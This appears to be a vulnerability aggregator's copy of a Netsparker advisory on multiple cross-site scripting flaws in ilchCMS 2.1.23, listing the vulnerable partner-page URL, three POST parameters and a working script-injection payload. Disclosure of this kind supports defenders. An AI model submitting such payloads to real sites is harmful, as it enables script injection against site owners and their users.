Lucene search
K

ilchCMS 2.1.23 Cross Site Scripting

🗓️ 04 Nov 2019 00:00:00Reported by Daniel BishtawiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 162 Views

Multiple Cross-site Scripting Vulnerabilities in ilchCMS 2.1.23, fixed on 'ilchCMS' vendor websit

Code
`Information  
--------------------  
  
Advisory by Netsparker  
Name: Multiple Cross-site Scripting Vulnerabilities in ilchCMS 2.1.23  
Affected Software: ilchCMS  
Affected Versions: 2.1.23  
Vendor Homepage: https://www.ilch.de/  
Vulnerability Type: Cross-site Scripting  
Severity: Medium  
Status: Fixed  
CVSS Score (3.0): AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N  
Netsparker Advisory Reference: NS-19-016  
  
Technical Details  
--------------------  
  
URL : http://{DOMAIN}/{PATH-OF-ILCHCMS}/index.php/partner/index  
Parameter Name: Link  
Parameter Type: Post  
Attack Pattern: '"@--></style></scRipt><scRipt>alert(0x00BFFE)</scRipt>  
  
URL : http://{DOMAIN}/{PATH-OF-ILCHCMS}/index.php/partner/index  
Parameter Name: Name  
Parameter Type: Post  
Attack Pattern: '"@--></style></scRipt><scRipt>alert(0x00BFFE)</scRipt>  
  
URL : http://{DOMAIN}/{PATH-OF-ILCHCMS}/index.php/partner/index  
Parameter Name: Banner  
Parameter Type: Post  
Attack Pattern: '"@--></style></scRipt><scRipt>alert(0x00BFFE)</scRipt>  
  
Note  
  
- Auth: No  
- Token: Yes  
  
  
For more information:  
https://www.netsparker.com/web-applications-advisories/ns-19-016-cross-site-scripting-in-ilchcms/  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation